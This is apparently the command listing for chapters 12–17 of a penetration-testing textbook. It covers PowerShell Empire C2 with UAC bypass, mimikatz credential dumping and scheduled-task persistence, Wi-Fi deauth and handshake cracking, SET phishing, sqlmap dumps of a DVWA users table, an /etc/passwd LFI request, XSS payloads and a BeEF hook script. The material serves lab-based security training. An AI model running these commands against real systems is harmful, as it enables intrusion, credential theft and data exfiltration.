Figure 12.42 – Viewing a list of tasks on the agent
Figure 12.43 – Displaying system information
Figure 12.44 – Navigating the filesystem
Figure 12.45 – Viewing collected credentials
Figure 12.46 – Reporting

Code and Commands

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install -y powershell-empire starkiller
Command 12.1

kali@kali:~$ sudo powershell-empire server
Command 12.2

kali@kali:~$ sudo mousepad /etc/powershell-empire/client/config.yaml
Command 12.3

Empire-Server:
  host: https://172.30.1.30
  port: 1337
  socketport: 5000
  username: empireadmin
  password: password123
Code 12.1

kali@kali:~$ sudo powershell-empire client
Command 12.4

(Empire) > connect -c Empire-Server
Command 12.5

(Empire) > admin
(Empire: admin) > user_list
Command 12.6

(Empire: admin) > create_user NewUser1 Password123
(Empire: admin) > user_list
Command 12.7

(Empire: admin) > disable_user 2
(Empire: admin) > user_list
Command 12.8

kali@kali:~$ sudo powershell-empire server
Command 12.9

kali@kali:~$ sudo powershell-empire client
Command 12.10

(Empire) > uselistener http
Command 12.11

(Empire: uselistener/http) > set Name DClistener
Command 12.12

(Empire: uselistener/http) > set Host 192.168.42.20
Command 12.13

(Empire: uselistener/http) > set Port 1335
Command 12.14

(Empire: uselistener/http) > options
Command 12.15

(Empire: uselistener/http) > execute
Command 12.16

(Empire) > listeners
Command 12.17

(Empire) > usestager multi/launcher
Command 12.18

(Empire: usestager/multi/launcher) > set Listener DClistener
Command 12.19

(Empire: usestager/multi/launcher) > generate
Command 12.20

(Empire) > agents
Command 12.21

(Empire: agents) > interact 2N534EK6
(Empire: 2N534EK6) > help
Command 12.22

(Empire: 2N534EK6) > info
Command 12.23

(Empire: 2N534EK6) > display high_integrity
high_integrity is 1
Command 12.24

(Empire: 2N534EK6) > bypassuac DClistener
Command 12.25

(Empire: 2N534EK6) > shell ipconfig
Command 12.26

(Empire: 2N534EK6) > mimikatz
Command 12.27

(Empire: 2N534EK6) > credentials
Command 12.28

(Empire: credentials) > interact 2N534EK6
(Empire: 2N534EK6) > shell ps
Command 12.29

(Empire: 2N534EK6) > psinject DClistener 3140
Command 12.30

(Empire: agents) > interact 2N534EK6
(Empire: 2N534EK6) > shell
Command 12.31

(Empire) > uselistener http_malleable
Command 12.32

(Empire: uselistener/http_malleable) > set Profile office365_calendar.profile
Command 12.33

(Empire: uselistener/http_malleable) > set Host 192.168.40.20
(Empire: uselistener/http_malleable) > set Port 443
Command 12.34

(Empire: uselistener/http_malleable) > set Name ThreatEmulation
(Empire: uselistener/http_malleable) > execute
Command 12.35

(Empire: uselistener/http_malleable) > main
(Empire) > listeners
Command 12.36

(Empire: listeners) > usestager multi/launcher
(Empire: usestager/multi/launcher) > set Listener ThreatEmulation
Command 12.37

(Empire: usestager/multi/launcher) > generate
Command 12.38

(Empire: agents) > interact UY2F8P1T
(Empire: UY2F8P1T) > usemodule powershell/persistence/elevated/schtasks
Command 12.39

(Empire: usemodule/powershell/persistence/elevated/schtasks) > set OnLogon True
Command 12.40

(Empire: usemodule/powershell/persistence/elevated/schtasks) > set Listener ThreatEmulation
(Empire: usemodule/powershell/persistence/elevated/schtasks) > execute
Command 12.41

SUCCESS: The scheduled task "Updater" has successfully been created.
Schtasks persistence established using listener ThreatEmulation stored in HKLM:\Software\Microsoft\Network\debug with Updater OnLogon trigger.
Command 12.42

kali@kali:~$ sudo powershell-empire server
Command 12.43

kali@kali:~$ sudo starkiller
Command 12.44

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
• Overview of Empire 4: https://www.bc-security.org/post/overview-of-empire-4-0-and-c/

• Empire wiki: https://bc-security.gitbook.io/empire-wiki/

• Empire: Malleable C2 Profiles: https://www.bc-security.org/post/empire-malleable-c2-profiles/

Chapter 13
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/

• Windows 10 Enterprise: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise

• FreeRADIUS: https://freeradius.org/

• airgeddon: https://github.com/v1s1t0r1sh3r3/airgeddon

• An Alfa AWUS036NHA High Gain Wireless B/G/N USB adapter

• An Alfa AWUS036ACH Long-Range Dual-Band AC1200 Wireless USB 3.0 Wi-Fi adapter

• A physical wireless router that supports WEP, WPA2-Personal, WPA2-Enterprise, and WPA3 security standards

Images

Figure 13.1 – Wireless standards
Figure 13.2 – Non-overlapping wireless channels
Figure 13.3 – Frequency comparison table
Figure 13.4 – SISO
Figure 13.5 – MIMO
Figure 13.6 – SU-MIMO
Figure 13.7 – MU-MIMO
Figure 13.8 – Checking for wireless network adapters
Figure 13.9 – Enabling monitoring mode
Figure 13.10 – Verifying monitor mode
Figure 13.11 – Monitoring wireless networks
Figure 13.12 – Capturing probes from wireless clients
Figure 13.13 – Filtering networks
Figure 13.14 – Filtering a specific wireless network
Figure 13.15 – Scanning for target wireless networks
Figure 13.16 – De-authentication attack
Figure 13.17 – Observing associated clients
Figure 13.18 – Wireless router configurations
Figure 13.19 – Checking the wireless network adapter's status
Figure 13.20 – Enabling monitor mode
Figure 13.21 – Checking the interface's status
Figure 13.22 – Searching for the target network
Figure 13.23 – Capturing the WPA/WPA2 handshake
Figure 13.24 – Cracking the WPA/WPA2 network
Figure 13.25 – Capturing probes
Figure 13.26 – Checking the wireless adapter's status
Figure 13.27 – Enabling monitor mode
Figure 13.28 – Hostapd configuration file
Figure 13.29 – Starting the honeypot
Figure 13.30 – Capturing the WPA handshake
Figure 13.31 – aircrack-ng password cracking
Figure 13.32 – Enterprise wireless lab
Figure 13.33 – Checking optional tools
Figure 13.34 – Selecting a wireless network adapter
Figure 13.35 – Enabling monitor mode
Figure 13.36 – Accessing Enterprise attacks menu
Figure 13.37 – Creating custom digital certificates
Figure 13.38 – Certificate options
Figure 13.39 – Explore for targets
Figure 13.40 – Discovering targets
Figure 13.41 – Selecting a target network
Figure 13.42 – The Enterprise Evil Twin menu
Figure 13.43 – Selecting Deauth aireplay attack
Figure 13.44 – Launching the attack
Figure 13.45 – User hash captured
Figure 13.46 – Enterprise attacks menu
Figure 13.47 – Accessing the decryption menu
Figure 13.48 – Accessing the Enterprise decryption menu
Figure 13.49 – Choosing the decryption type
Figure 13.50 – Interactive options
Figure 13.51 – Password retrieved
Figure 13.52 – Selecting a wireless network adapter
Figure 13.53 – Enabling monitor mode
Figure 13.54 – Accessing Evil Twin attacks menu
Figure 13.55 – Explore for targets
Figure 13.56 – Nearby wireless networks
Figure 13.57 – Choosing a target
Figure 13.58 – Choosing an attack type
Figure 13.59 – Selecting Deauth aireplay attack
Figure 13.60 – Selecting an internet interface
Figure 13.61 – Honeypot in effect
Figure 13.62 – Checking the wireless network adapter's status
Figure 13.63 – Enabling monitor mode
Figure 13.64 – Checking the interface's status
Figure 13.65 – Discovering the target network
Figure 13.66 – Deauthentication attack
Figure 13.67 – Capturing the WPA handshake
Figure 13.68 – Password cracking
Figure 13.69 – Researching security vulnerabilities
Figure 13.70 – Password generator

Code and Commands

kali@kali:~$ sudo airmon-ng check kill
kali@kali:~$ sudo airmon-ng start wlan0
Command 13.1

kali@kali:~$ sudo airodump-ng wlan0mon
Command 13.2

kali@kali:~$ sudo airodump-ng -c 6 wlan0mon
Command 13.3

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi wlan0mon
Command 13.4

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi wlan0mon
Command 13.5

kali@kali:~$ sudo aireplay-ng -0 100 -e Corp_Wi-Fi wlan0mon
Command 13.6

kali@kali:~$ sudo airmon-ng check kill
Command 13.7

kali@kali:~$ sudo airmon-ng start wlan0
Command 13.8

kali@kali:~$ sudo airodump-ng wlan0mon
Command 13.9

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi wlan0mon -w Corp_Wi-Fi
Command 13.10

kali@kali:~$ sudo aireplay-ng -0 100 -a 68:7F:74:01:28:E1 wlan0mon
Command 13.11

kali@kali:~$ aircrack-ng Corp_Wi-Fi-01.cap -w /usr/share/wordlists/rockyou.txt
Command 13.12

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install hostapd
Command 13.13

kali@kali:~$ sudo airmon-ng check kill
kali@kali:~$ sudo airmon-ng start wlan1
Command 13.14

kali@kali:~$ mousepad wpa2-attack.conf
Command 13.15

interface=wlan0
driver=nl80211
ssid=Corp_Wi-Fi
wpa=2
wpa_passphrase=fakepassword
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
channel=6
Code 13.1

kali@kali:~$ sudo airodump-ng -c 6 --essid Corp_Wi-Fi wlan1mon -w APLessAttack
Command 13.16

kali@kali:~$ sudo hostapd wpa2-attack.conf
Command 13.17

kali@kali:~$ aircrack-ng APLessAttack-01.cap -w /usr/share/wordlists/rockyou.txt
Command 13.18

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install airgeddon
Command 13.19

kali@kali:~$ sudo airgeddon
Command 13.20

kali@kali:~$ sudo apt install bettercap
kali@kali:~$ sudo apt install dnsmasq
kali@kali:~$ sudo apt install hostapd-wpe
kali@kali:~$ sudo apt install isc-dhcp-server
kali@kali:~$ sudo apt install asleap
kali@kali:~$ sudo apt install hostapd
kali@kali:~$ sudo apt install mdk4
kali@kali:~$ sudo apt install hcxdumptool
kali@kali:~$ sudo apt install hcxtools
kali@kali:~$ sudo apt install beef-xss
kali@kali:~$ sudo apt install lighttpd
Command 13.21

kali@kali:~$ sudo airgeddon
Command 13.22

/home/kali/enterprise-Corp_Wi-Fi/
Command 13.23

/home/kali/enterprise-Corp_Wi-Fi/enterprise_captured_john_<BSSID_value>_hashes.txt
Command 13.24

/usr/share/wordlists/rockyou.txt
Command 13.25

kali@kali:~$ sudo airgeddon
Command 13.26

kali@kali:~$ sudo airmon-ng check kill
Command 13.27

kali@kali:~$ sudo airmon-ng start wlan0
Command 13.28

kali@kali:~$ sudo airodump-ng wlan0mon
Command 13.29

kali@kali:~$ sudo airodump-ng -c 8 --essid WPA3_Corp_Wi-Fi wlan0mon -w WPA3_downgrade
Command 13.30

kali@kali:~$ sudo aireplay-ng -0 100 -a 92:83:C4:0C:5B:88 wlan0mon
Command 13.31

kali@kali:~$ aircrack-ng WPA3_downgrade-01.cap -w /usr/share/wordlists/rockyou.txt
Command 13.32

Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
• Guidelines for Securing Wireless Local Area Networks (WLANs): https://csrc.nist.gov/publications/detail/sp/800-153/final

• Key Reinstallation Attacks: https://www.krackattacks.com/

Chapter 14
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following software requirement:
• Kali Linux 2021.2 – https://www.kali.org/get-kali/

Images

Figure 14.1 – SET menu
Figure 14.2 – Accessing the Website Attacks menu
Figure 14.3 – Accessing the Credential Harvester Attack Method menu
Figure 14.4 – Using Site Cloner
Figure 14.5 – Setting up the attack
Figure 14.6 – Displaying the phishing website
Figure 14.7 – Capturing user credentials
Figure 14.8 – Redirection to the legitimate website
Figure 14.9 – Accessing the Infectious Media Generator menu
Figure 14.10 – Selecting an executable type
Figure 14.11 – Configuring the payload
Figure 14.12 – Reverse shell
Figure 14.13 – Viewing active shells
Figure 14.14 – Interacting with a shell

Code and Commands

kali@kali:~$ sudo setoolkit
Command 14.1

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
• Social Engineering – https://www.imperva.com/learn/application-security/social-engineering-attack/

• Avoiding Social Engineering and Phishing Attacks – https://us-cert.cisa.gov/ncas/tips/ST04-014

Chapter 15
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2 – https://www.kali.org/get-kali/

• Burp Suite – https://portswigger.net/burp

• OWASP Juice Shop – https://owasp.org/www-project-juice-shop/

Images

Figure 15.1 – Web application
Figure 15.2 – HTTP header
Figure 15.3 – HTTP response header
Figure 15.4 – Burp Suite intercepting request messages
Figure 15.5 – FoxyProxy
Figure 15.6 – Installing FoxyProxy
Figure 15.7 – Accessing the menu of FoxyProxy
Figure 15.8 – Configuring a proxy
Figure 15.9 – Switching proxies
Figure 15.10 – Opening Burp Suite
Figure 15.11 – Configuring the Intercept Client Requests options
Figure 15.12 – Configuring the Intercept Server Responses options
Figure 15.13 – Proxy Intercept tab
Figure 15.14 – Defining the scope
Figure 15.15 – Filter options
Figure 15.16 – Passive crawling
Figure 15.17 – Capturing a web request
Figure 15.18 – Sending to Repeater
Figure 15.19 – Working with Repeater
Figure 15.20 – Score Board
Figure 15.21 – Web server deployment
Figure 15.22 – Filtering challenges
Figure 15.23 – Capturing the HTTP POST message
Figure 15.24 – Forwarding the HTTP POST message
Figure 15.25 – Creating a SQL error
Figure 15.26 – Checking for SQL errors
Figure 15.27 – SQL injection
Figure 15.28 – Intercepting the HTTP POST message
Figure 15.29 – Response from the web application
Figure 15.30 – Gaining access
Figure 15.31 – Capturing a request message
Figure 15.32 – Modifying headers
Figure 15.33 – HTTP status update
Figure 15.34 – Administration section
Figure 15.35 – Discovering hidden directories
Figure 15.36 – Checking the sensitive directory
Figure 15.37 – Accessing confidential files
Figure 15.38 – Looking for sensitive files
Figure 15.39 – Viewing data
Figure 15.40 – Decoding Base64
Figure 15.41 – ROT13 decryption
Figure 15.42 – Completing the challenge
Figure 15.43 – Capturing an HTTP request
Figure 15.44 – Modifying an HTTP request message
Figure 15.45 – Abusing security misconfigurations

Code and Commands

kali@kali:~$ sudo docker run --rm -p 3000:3000 bkimminich/juice-shop
Command 15.1

GET /administration/ HTTP/1.1
Code 15.1

kali@kali:~$ dirb http://localhost:3000 /usr/share/wordlists/dirb/big.txt -r -N 403
Command 15.2

http://localhost:3000/ftp/eastere.gg%2500.md
Code 15.2

kali@kali:~$ sudo apt update
kali@kali:~$ sudo apt install hurl
kali@kali:~$ hURL --help
Command 15.3

kali@kali:~$ hURL -8 "/gur/qrif/ner/fb/shaal/gurl/uvq/na/rnfgre/rtt/jvguva/gur/rnfgre/rtt"
Command 15.4

http://localhost:3000/the/devs/are/so/funny/they/hid/an/easter/egg/within/the/easter/egg
Code 15.3

GET /rest/fakepath HTTP/1.1
Code 15.4

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
• OWASP Top 10 – https://owasp.org/www-project-top-ten/

• OWASP Top 10 as a standard – https://owasp.org/Top10/A00_2021_How_to_use_the_OWASP_Top_10_as_a_standard/

• AppSec Program with the OWASP Top 10 – https://owasp.org/Top10/A00_2021-How_to_start_an_AppSec_program_with_the_OWASP_Top_10/

Chapter 16
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/

• Windows 10 Enterprise: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise

• Burp Suite: https://portswigger.net/burp

• OWASP Broken Web Applications: https://sourceforge.net/projects/owaspbwa/files/

• OWASP Juice Shop: https://owasp.org/www-project-juice-shop/

Images

Figure 16.1 – Insecure directory
Figure 16.2 – Error opening the file
Figure 16.3 – Viewing the packages
Figure 16.4 – Researching the epilogue-js package
Figure 16.5 – Submitting feedback
Figure 16.6 – Resetting password
Figure 16.7 – Revealing the security question
Figure 16.8 – Sending traffic
Figure 16.9 – HTTP POST message
Figure 16.10 – Inserting a new position
Figure 16.11 – Setting the payload
Figure 16.12 – Identifying the correct name
Figure 16.13 – OWASP BWA banner
Figure 16.14 – OWASP BWA home page
Figure 16.15 – Selecting a bug
Figure 16.16 – Generating HTTP traffic
Figure 16.17 – HTTP GET message
Figure 16.18 – Modifying the HTTP request
Figure 16.19 – Bypassing the security controls
Figure 16.20 – OWASP BWA banner
Figure 16.21 – OWASP BWA home page
Figure 16.22 – Selecting a vulnerable application
Figure 16.23 – Selecting a vulnerability type
Figure 16.24 – Checking for SQL injection
Figure 16.25 – HTTP GET request
Figure 16.26 – Detecting vulnerabilities
Figure 16.27 – Discovering databases
Figure 16.28 – Retrieving tables
Figure 16.29 – Columns of the users table
Figure 16.30 – Columns retrieved from a table
Figure 16.31 – Retrieving columns only
Figure 16.32 – Password cracking process
Figure 16.33 – Extracted data
Figure 16.34 – An XSS attack
Figure 16.35 – CSRF attack
Figure 16.36 – OWASP BWA banner
Figure 16.37 – OWASP BWA home page
Figure 16.38 – Selecting a bug
Figure 16.39 – Generating an HTTP request
Figure 16.40 – Testing reflected XSS
Figure 16.41 – Reflected XSS working
Figure 16.42 – Selecting a bug
Figure 16.43 – Storing data on a web application
Figure 16.44 – Performing stored XSS
Figure 16.45 – Invisible entry
Figure 16.46 – Opening BeEF
Figure 16.47 – BeEF service
Figure 16.48 – BeEF login page
Figure 16.49 – Custom web page
Figure 16.50 – Loading the malicious web page
Figure 16.51 – Hooked web browser
Figure 16.52 – Sending a social engineering attack
Figure 16.53 – Pop-up window on the victim's browser

Code and Commands

GET /bWAPP/rlfi.php?language=file:///etc/passwd&action=go HTTP/1.1
Code 16.1

sudo sqlmap --url <URL> --cookie='<cookie token>' --dbs
Command 16.1

kali@kali:~$ sudo sqlmap --url http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --dbs
Command 16.2

kali@kali:~$ sudo sqlmap --url http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --tables -D dvwa
Command 16.3

kali@kali:~$ sudo sqlmap --url http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --columns -D dvwa
Command 16.4

kali@kali:~$ sudo sqlmap --url http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --columns -D dvwa -T users
Command 16.5

kali@kali:~$ sudo sqlmap --url http://172.30.1.24/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=ii9iqv2f0fgd7g057hkounq103' --dump -D dvwa -T users
Command 16.6

<script>alert("Testing Reflected XSS")</script>
Code 16.2

Command 16.7

<script>alert("Testing Stored XSS")</script>
Code 16.3

kali@kali:~$ service apache2 start
Command 16.8

kali@kali:~$ sudo mousepad /var/www/html/index.html
Command 16.9

<html>
  <head>
    <title>Web Page</title>
    <script src="http://<IP>:3000/hook.js"></script>
  </head>
  <body>
    <h1>This is a vulnerable web page</h1>
    <p>We are using browser exploitation.</p>
  </body>
</html>
Code 16.4

Further reading
To learn more about the topics that were covered in this chapter, please go to the
following links:
• OWASP Top 10: https://owasp.org/www-project-top-ten/

• OWASP Top 10 as a standard: https://owasp.org/Top10/A00_2021_How_to_use_the_OWASP_Top_10_as_a_standard/

• AppSec Program with the OWASP Top 10: https://owasp.org/Top10/A00_2021-How_to_start_an_AppSec_program_with_the_OWASP_Top_10/

Chapter 17
Technical requirements
To follow along with the exercises in this chapter, please ensure that you have met the
following hardware and software requirements:
• Kali Linux 2021.2: https://www.kali.org/get-kali/

Images

Figure 17.1 – WiFi Pineapple Nano
Figure 17.2 – ESP8266 microcontroller
Figure 17.3 – Bash Bunny
Figure 17.4 – Packet Squirrel
Figure 17.5 – LAN Turtle
Figure 17.6 – USB-powered network switch
Figure 17.7 – Retractable cable
Figure 17.8 – ZeroTier network connectivity
Figure 17.9 – Creating a network
Figure 17.10 – Joining a network
Figure 17.11 – Member
Figure 17.12 – Allowing a member

Further reading
To learn more about the topics covered in this chapter, you can refer to the following
links:
• Rules of engagement: https://hub.packtpub.com/penetration-testing-rules-of-engagement/

• Penetration testing methodologies: https://wiki.owasp.org/index.php/Penetration_testing_methodologies

• OWASP Testing Checklist: https://github.com/tanprathan/OWASP-Testing-Checklist

• CyberChef: https://gchq.github.io/CyberChef/

• PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
